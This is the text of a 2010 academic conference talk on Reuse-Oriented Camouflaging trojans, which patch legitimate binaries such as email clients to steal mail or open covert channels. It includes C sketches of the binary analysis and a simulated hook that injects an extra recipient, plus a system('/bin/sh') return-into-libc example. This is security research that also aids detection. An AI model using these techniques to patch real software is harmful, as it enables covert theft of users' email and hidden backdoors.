Reuse-Oriented Camouflaging Trojan: Vulnerability Detection and Attack Construction
Zhiqiang Lin, Xiangyu Zhang, Dongyan Xu
Purdue University
The 40th Annual IEEE/IFIP International Conference on Dependable Systems and Networks
July 1st, 2010
Background: reuse-oriented attacks
- Return-into-libc attack: reuses library calls, e.g., system("/bin/sh")
- Return-oriented programming [Shacham, CCS'07]: reuses gadgets (short instruction sequences), e.g., a gadget in libc: pop eax; pop ebx; ret
- Coarse-grained reuse from legal binaries: reuses legal functions
Feasibility
- Binaries are everywhere.
- Legal binaries contain functional features that can be reused for malicious purposes.
Feasibility (cont.)
Incentives to launch such an attack:
- No environment setup
- No stand-alone code needed to implement the malicious semantics
→ Reuse-Oriented Camouflaging (ROC) Trojan
Feasibility (cont.): vxheaven.org (260K malware samples)
Feasibility (cont.): Distribution?
Figure: How the top 100 malware programs of 2008 infect computers
How to launch the ROC attack
Step I: The attacker has a goal and obtains a victim binary.
Step II: The attacker wants to reuse some function f(x) to achieve the malicious goal:
- Where is f? (feature extraction)
- Does f have side effects? (side effect analysis)
- Where is x, and how can x be accessed? (argument reverse engineering)
Step III: The attacker patches f(x), producing an ROC trojan.
Step IV: The attacker distributes the ROC trojan.
Reuse of F(x):
- Patching argument x: { F(x) } → { F(y) }, e.g., send("alice") → send("alice,bob")
- Duplication: { F(x) } → { F(x), F(y) }, e.g., send("alice", "normal email") → send("alice", "normal email"), send("alice", "spam email")
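To make the two reuse modes concrete, here is a minimal C sketch. send_stub is a hypothetical stand-in for the reused function F (send on the slide); it only logs its arguments, so the call sequences of the original program and of the two trojan variants can be compared. A body argument is added to the patching example so both variants use the same two-argument form.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for the reused function F (send on the slide).
   It records each call instead of sending mail. */
static char call_log[256];

static void send_stub(const char *to, const char *body) {
    size_t used = strlen(call_log);
    assert(used < sizeof call_log);
    snprintf(call_log + used, sizeof call_log - used, "send(%s,%s);", to, body);
}

/* Original program: { F(x) } */
static void original_run(void) { send_stub("alice", "normal email"); }

/* Patching argument x: { F(x) } -> { F(y) }; the call stays, its argument changes. */
static void patched_run(void) { send_stub("alice,bob", "normal email"); }

/* Duplication: { F(x) } -> { F(x), F(y) }; the legitimate call still runs,
   followed by an injected call with attacker-chosen arguments. */
static void duplicated_run(void) {
    send_stub("alice", "normal email");
    send_stub("alice", "spam email");
}

/* Clears the log, runs one variant, and returns the calls it made. */
static const char *trace(void (*run)(void)) {
    call_log[0] = '\0';
    run();
    return call_log;
}
```

With this sketch, trace(duplicated_run) yields both calls with the legitimate one first, which is what lets the duplicated variant keep the program's normal visible behavior.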
A driving example
Victim binary:

    /* readconfig, editor, send_mail, use_default and BODY_SIZE are
       defined elsewhere in the victim program. */
    struct Email_ADDRESS {
        char *name;
        char *domain;
        struct Email_ADDRESS *next;   /* linked list of addresses */
    };
    struct Email_ADDRESS sender_addr;

    int main(void) {
        struct {
            struct Email_ADDRESS *to;
            struct Email_ADDRESS *from;
        } header;
        char body[BODY_SIZE];

        readconfig(&sender_addr);      /* fill in the sender address */
        if (use_default)
            header.from = &sender_addr;

        editor(&header, body);         /* compose the message */
        send_mail(&header, body);      /* the function the attack patches */
        return 0;
    }

Attack goal: get a copy of every email whenever someone uses the client to send email.
Cheat sheet: patch the next field of the Email_ADDRESS pointed to by field to of argument header.

Speaker notes: In the rest of my talk, I will use a simplified email client to illustrate how we analyze the binary and launch our attack. At a high level, this email client has the code above. First, it declares an Email_ADDRESS type, which is a linked list. Then it has a main function, which declares a header data structure and a message body char array. It invokes readconfig to fill the global variable sender_addr, invokes editor, and finally sends the email. Our analysis will show that an email redirection attack is possible if we patch the function send_mail. How do we reach this conclusion? We use three key techniques: feature extraction, side effect analysis, and argument reverse engineering.
I. Feature extraction
Goal: get reusable functions f
Dynamic analysis tracks:
- Call graph (CG)
- Data usage: data definition, data use, data propagation
- Input & output
Then annotate the CG with the data used in each function.
I. Feature extraction
Figure: the email client's dynamic call graph (main, read_config, editor, send_mail, smtp_open, smtp_ehlo, smtp_mail, smtp_send, sys_write; instances labeled a to k), with each function instance annotated with the data it uses, e.g., alice@bob.com, bob@bob.com, Hello\r\n, EHLO [10.0.0.4]\r\n, MAIL FROM:<alice@bob.com>\r\n, RCPT TO:<bob@bob.com>\r\n, and the assembled message "X-X-Sender: alice@bob.com\r\n To: bob@bob.com\r\n Hello\r\n".
I. Feature extraction – candidate function
A function instance f is a candidate function if it is the common ancestor of all the function instances that use or define the observed data.
Figure: the annotated call graph of the email client.
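The candidate-function rule is a common-ancestor query over the dynamic call tree. The sketch below assumes the deepest such ancestor is wanted and uses a hypothetical tree built from the function names on the slide, marking smtp_mail and sys_write as the instances that use the observed RCPT TO data. The tree shape and the marking are illustrative assumptions, not the paper's actual trace.

```c
#include <assert.h>
#include <stddef.h>

/* One node per function *instance* in the dynamic call tree. */
struct fn_instance {
    const char *name;
    int parent;      /* index of the calling instance, -1 for the root */
    int uses_data;   /* 1 if this instance uses or defines the observed data */
};

/* Hypothetical call tree using the function names from the slide. */
static const struct fn_instance call_tree[] = {
    { "main",        -1, 0 },  /* 0 */
    { "read_config",  0, 0 },  /* 1 */
    { "editor",       0, 0 },  /* 2 */
    { "send_mail",    0, 0 },  /* 3 */
    { "smtp_open",    3, 0 },  /* 4 */
    { "smtp_ehlo",    3, 0 },  /* 5 */
    { "smtp_mail",    3, 1 },  /* 6: builds RCPT TO:<bob@bob.com> */
    { "smtp_send",    3, 0 },  /* 7 */
    { "sys_write",    7, 1 },  /* 8: writes the data out */
};

static int depth_of(const struct fn_instance *t, int i) {
    int d = 0;
    while (t[i].parent >= 0) { i = t[i].parent; d++; }
    return d;
}

/* Lowest common ancestor of two instances: lift the deeper one to the
   same depth, then walk both up in lockstep until they meet. */
static int lca2(const struct fn_instance *t, int a, int b) {
    int da = depth_of(t, a), db = depth_of(t, b);
    while (da > db) { a = t[a].parent; da--; }
    while (db > da) { b = t[b].parent; db--; }
    while (a != b) { a = t[a].parent; b = t[b].parent; }
    return a;
}

/* Deepest common ancestor of all marked instances, or -1 if none is marked. */
static int candidate_function(const struct fn_instance *t, size_t n) {
    assert(n == 0 || t != NULL);
    int cand = -1;
    for (size_t i = 0; i < n; i++) {
        if (!t[i].uses_data)
            continue;
        cand = (cand < 0) ? (int)i : lca2(t, cand, (int)i);
    }
    return cand;
}
```

With this marking, candidate_function returns index 3, send_mail. If editor were also marked (for example, because it defines the recipient), the answer would move up to main.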
II. Side effect analysis
- What: a memory write in a function instance whose value is used after the function returns
- Why: only needed if we want to duplicate a function call, f(x) → f(x), f(y)
- How: track memory writes to heap, global, and stack variables
Figure: the annotated call graph of the email client.
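A minimal sketch of the side-effect check over a recorded trace, assuming each event carries a global timestamp and that a function instance's lifetime is the interval [start, end]. A write inside the interval counts as a side effect if some read after end still sees that value, i.e., no other write to the same address intervenes. The trace format (struct mem_event) is hypothetical, and the nested loops are chosen for clarity rather than speed.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

enum access_kind { MEM_READ, MEM_WRITE };

/* One memory access from a (hypothetical) trace; `time` is a global
   instruction counter, so events are totally ordered. */
struct mem_event {
    unsigned long time;
    enum access_kind kind;
    uintptr_t addr;
};

/* Returns 1 if a write made during [start, end] reaches a read after `end`
   without being overwritten first, i.e., the instance has a side effect. */
static int has_side_effect(const struct mem_event *ev, size_t n,
                           unsigned long start, unsigned long end) {
    assert(start <= end);
    for (size_t i = 0; i < n; i++) {
        const struct mem_event *w = &ev[i];
        if (w->kind != MEM_WRITE || w->time < start || w->time > end)
            continue;
        for (size_t j = 0; j < n; j++) {
            const struct mem_event *r = &ev[j];
            if (r->kind != MEM_READ || r->addr != w->addr || r->time <= end)
                continue;
            /* Does another write to the same address kill w before r? */
            int killed = 0;
            for (size_t k = 0; k < n; k++)
                if (ev[k].kind == MEM_WRITE && ev[k].addr == w->addr &&
                    ev[k].time > w->time && ev[k].time < r->time)
                    killed = 1;
            if (!killed)
                return 1;
        }
    }
    return 0;
}
```

A write to a local that is never read after the return, or a global that is overwritten before its next read, is not reported, which matches the definition on the slide.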
III. Argument reverse engineering
Now we have identified the candidate function f to patch, but how do we pass malicious arguments to f?
- Which argument x should be patched?
- How can x be accessed without symbolic information?
Reference graph: a graph whose nodes are the set of memory regions and whose edges are the set of points-to relations.
Figure: memory regions connected by points-to edges.
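The reference graph can be sketched as follows, assuming a snapshot that lists each memory region with its base address and its contents as 32-bit words (as on the 32-bit x86 target). An edge i → j is added when some word in region i holds an address inside region j. The region list and the addresses in example_snapshot are made up for illustration: an argument area, a header, and one recipient address.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MAX_REGIONS 16

/* A memory region from a snapshot (heap block, global, or stack area). */
struct region {
    uint32_t base;
    uint32_t nwords;
    const uint32_t *words;
};

/* edge[i][j] = byte offset in region i of the first pointer into region j,
   or -1 when there is no points-to edge. */
static int edge[MAX_REGIONS][MAX_REGIONS];

static void build_reference_graph(const struct region *r, size_t n) {
    assert(n <= MAX_REGIONS);
    for (size_t i = 0; i < MAX_REGIONS; i++)
        for (size_t j = 0; j < MAX_REGIONS; j++)
            edge[i][j] = -1;
    for (size_t i = 0; i < n; i++)
        for (uint32_t w = 0; w < r[i].nwords; w++) {
            uint32_t v = r[i].words[w];   /* treat every word as a possible pointer */
            for (size_t j = 0; j < n; j++)
                if (edge[i][j] < 0 && v >= r[j].base &&
                    v - r[j].base < 4u * r[j].nwords)
                    edge[i][j] = (int)(4 * w);
        }
}

/* Hypothetical snapshot; regions for body, from, and strings are omitted. */
static const uint32_t args_words[]   = { 0x2000, 0x3000 };    /* arg0 -> header, arg1 -> body */
static const uint32_t header_words[] = { 0x4000, 0x5000 };    /* to, from */
static const uint32_t to_words[]     = { 0x7000, 0x7010, 0 }; /* name, domain, next = NULL */
static const struct region example_snapshot[] = {
    { 0x1000, 2, args_words },
    { 0x2000, 2, header_words },
    { 0x4000, 3, to_words },
};
```

For example_snapshot, edge[0][1] and edge[1][2] are both 0 (each pointer sits at offset 0), mirroring the *(ESP+0) and +0 steps of a reference path.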
III. Argument reverse engineering
Figure: memory snapshot taken when send_mail is called for the email "From: <alice@bob.com> To: bob@bob.com" with body "Hello". Starting from ESP (bfff9960), arg0 (offset 0) and arg1 (offset 4) lead into the reference graph, whose leaves include the strings alice, bob.com, bob, bob.com, and Hello. Memory differencing compares such snapshots.
III. Argument reverse engineering
Figure: a second snapshot (ESP = bfff9970) for the same email sent to one more recipient ("To: bob@bob.com, bob1@bob1.com"). Differencing the two reference graphs shows that the new Email_ADDRESS node (bob1, bob1.com) is reached through the reference path (*(*(ESP+0)+0)+8).
Result: patch the next field (+8) of the Email_ADDRESS referenced by field to (+0) of argument header (+0).
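Memory differencing can be sketched as a parallel walk over the two reference graphs. Because the walk follows corresponding slots in both graphs, nodes are matched by the path that reaches them rather than by address, which matters since addresses differ between runs (ESP is bfff9960 in one snapshot and bfff9970 in the other). The node layout, the NIL/DATA slot encoding, and the assumption that node 0 is the stack area at ESP are all hypothetical; slots are 4 bytes apart, as on 32-bit x86.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

#define NSLOTS 4
#define NIL  (-1)   /* slot holds a NULL pointer */
#define DATA (-2)   /* slot holds non-pointer data */

/* Reference-graph node: slot k (byte offset 4*k) points to another node
   index, is NULL, or holds plain data. */
struct node { int slot[NSLOTS]; };

/* Walks g1 from node a and g2 from node b in parallel. On the first slot
   that is NULL in g1 but a pointer in g2, writes its path to out. */
static int diff_walk(const struct node *g1, int a, const struct node *g2, int b,
                     const char *path, char *out, size_t outsz, int depth) {
    if (depth > 8)
        return 0;   /* crude guard against cycles in this sketch */
    for (int k = 0; k < NSLOTS; k++) {
        int p1 = g1[a].slot[k], p2 = g2[b].slot[k];
        char here[128];
        snprintf(here, sizeof here, "(%s+%d)", path, 4 * k);
        if (p1 == NIL && p2 >= 0) {
            snprintf(out, outsz, "%s", here);
            return 1;
        }
        if (p1 >= 0 && p2 >= 0) {
            char deref[128];
            snprintf(deref, sizeof deref, "*%s", here);
            if (diff_walk(g1, p1, g2, p2, deref, out, outsz, depth + 1))
                return 1;
        }
    }
    return 0;
}

static int find_reference_path(const struct node *g1, const struct node *g2,
                               char *out, size_t outsz) {
    assert(outsz > 0);
    out[0] = '\0';
    return diff_walk(g1, 0, g2, 0, "ESP", out, outsz, 0);
}

/* Hypothetical graphs: 0 args, 1 header, 2 to (bob), 3-4 strings, 5 body, 6 from. */
static const struct node snap1[] = {
    {{1, 5, DATA, DATA}}, {{2, 6, DATA, DATA}}, {{3, 4, NIL, DATA}},
    {{DATA, DATA, DATA, DATA}}, {{DATA, DATA, DATA, DATA}},
    {{DATA, DATA, DATA, DATA}}, {{DATA, DATA, NIL, DATA}},
};
/* Second run: bob's next now points to node 7 (bob1). */
static const struct node snap2[] = {
    {{1, 5, DATA, DATA}}, {{2, 6, DATA, DATA}}, {{3, 4, 7, DATA}},
    {{DATA, DATA, DATA, DATA}}, {{DATA, DATA, DATA, DATA}},
    {{DATA, DATA, DATA, DATA}}, {{DATA, DATA, NIL, DATA}},
    {{DATA, DATA, NIL, DATA}},
};
```

On these graphs, find_reference_path(snap1, snap2, ...) produces (*(*(ESP+0)+0)+8): the first slot that is NULL in the one-recipient run but points to the new bob1 node in the two-recipient run.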
Put it all together
Figure: ROC workflow. The application binary and the attack goal feed dynamic analysis; feature extraction yields candidate functions f; side effect analysis turns them into vulnerable functions f; argument reverse engineering yields the reference path to argument x; the ROC attack composer then uses binary patching to produce the final trojan.
ROC: Reuse-Oriented Camouflaging
Implementation
Dynamic analysis
- Dynamic binary instrumentation tracks memory reads (uses), memory writes (definitions), data dependencies, input/output, heap allocations and de-allocations, call stack contexts, and caller-callee relations (call graph), and records them in a trace file
- Memory snapshots are taken
- Offline analysis runs on the trace file
Binary patching
- Binary rewriting/patching, leveraging a widely used virus embedding technique
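The offline step that recovers caller-callee relations can be sketched as a replay of call/return records with a shadow stack. The record format below is hypothetical and keeps only control-flow events; the real trace also carries the memory, I/O, and heap records listed above.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define MAX_FUNCS 16
#define MAX_DEPTH 64

enum ev_kind { EV_CALL, EV_RET };

/* Simplified trace record: only control-flow events. */
struct trace_rec {
    enum ev_kind kind;
    int func;   /* callee id for EV_CALL; ignored for EV_RET */
};

/* cg[caller][callee] = number of times caller invoked callee. */
static int cg[MAX_FUNCS][MAX_FUNCS];

/* Replays the trace with a shadow call stack. `root` is the function already
   running when tracing starts (e.g., main). Returns 0 on success, -1 if the
   trace is unbalanced or malformed. */
static int build_call_graph(const struct trace_rec *t, size_t n, int root) {
    int stack[MAX_DEPTH];
    int sp = 0;
    assert(root >= 0 && root < MAX_FUNCS);
    memset(cg, 0, sizeof cg);
    stack[sp++] = root;
    for (size_t i = 0; i < n; i++) {
        if (t[i].kind == EV_CALL) {
            if (sp == MAX_DEPTH || t[i].func < 0 || t[i].func >= MAX_FUNCS)
                return -1;
            cg[stack[sp - 1]][t[i].func]++;   /* edge: current top -> callee */
            stack[sp++] = t[i].func;
        } else {
            if (sp <= 1)
                return -1;                    /* return past the root */
            sp--;
        }
    }
    return 0;
}
```

Keeping a count per edge, rather than a flag, is a small design choice that also shows how often each caller-callee pair occurs in the run.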
Implementation (cont.): binary rewriting helper functions
Helper function: description
- BEFORE(int func) {code}: insert the code block before func
- AFTER(int func) {code}: insert the code block after func
- ENTRY(int func) {code}: insert the code block right inside func
- void get(int* field): retrieve the argument field
- void set(int* field, void* val): set the argument field to val
- void duplicate(int func): duplicate the invocation of func
Example:

    BEFORE(send_mail){ set(&next_receipt, "ghost@somewhere.com"); }

Safe reference path: (*(*(ESP+0)+0)+8)
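To show what the inserted block achieves at run time, here is a C sketch of a hypothetical expansion of BEFORE(send_mail){ set(&next_receipt, ...); }. The real attack rewrites the victim binary; this sketch only evaluates the reference path with raw offsets on a simulated argument area. Two choices are assumptions: the ghost recipient is spliced in after the first recipient instead of overwriting next (so existing recipients still get the mail), and the +8 offset is computed with offsetof, which equals 8 only with 4-byte pointers.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Same layout as the victim's Email_ADDRESS. With 4-byte pointers
   (32-bit x86), next sits at byte offset 8, the "+8" in the path. */
struct Email_ADDRESS {
    char *name;
    char *domain;
    struct Email_ADDRESS *next;
};

/* Hypothetical attacker-controlled recipient to splice in. */
static struct Email_ADDRESS ghost = { "ghost", "somewhere.com", NULL };

/* Hypothetical body of the block inserted before send_mail. `esp` points at
   send_mail's arguments on entry, so esp[0] is &header. The reference path
   (*(*(ESP+0)+0)+8) is evaluated with offsets only, no symbol information. */
static void before_send_mail(void **esp) {
    assert(esp != NULL);
    const char *header = esp[0];                 /* *(ESP+0) */
    struct Email_ADDRESS *to;
    memcpy(&to, header + 0, sizeof to);          /* *(*(ESP+0)+0) */
    if (to == NULL)
        return;                                  /* no recipient to patch */
    struct Email_ADDRESS **next_slot = (struct Email_ADDRESS **)
        ((char *)to + offsetof(struct Email_ADDRESS, next));  /* ...+8 */
    if (*next_slot == &ghost)
        return;                                  /* already patched */
    ghost.next = *next_slot;                     /* keep the remaining recipients */
    *next_slot = &ghost;
}
```

Calling before_send_mail twice leaves a single ghost entry in the list, since the second call sees that the slot already points to it.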
Evaluation
Benchmark                             Binary size    Attack
Pine-4.63                             6.3M           Email stealing/spamming
Mailx-12.4                            712K           Email stealing/spamming
Mutella-0.4.5                         843K           Introducing covert C&C channel
Peercast-0.1217                       58K            Introducing covert C&C channel
Gift-0.11.81 (libGnutella.so.0.11)    321K / 657K    File transferring
Discussion
Achilles' heel of ROC: it breaks software modularity
Binary integrity check
- Tripwire [Kim and Spafford, CCS'94]
- Requires up-to-date, globally consistent hash values
- Frequent, automatic software patching; decentralized distribution
Breaking software modularity
- Violates the "software development principle"
Seemingly easy defense: killer heeling
Related work
Binary reuse in malware analysis:
- BCR [Caballero et al., NDSS'10]
- Inspector Gadget [Kolbitsch et al., Oakland'10]
Difference (figure): how those systems and ROC reuse F(x) and F(y)
Summary
- ROC trojan
- An analysis framework:
  - Dynamic binary analysis: feature extraction, side effect analysis, argument reverse engineering
  - Binary patching
- Such attacks are real and can be constructed systematically.
- However, defenders can use the same analysis to detect ROC vulnerabilities in binaries.
Q & A
Thank you!
For more information: {zlin, xyzhang, dxu}@cs.purdue.edu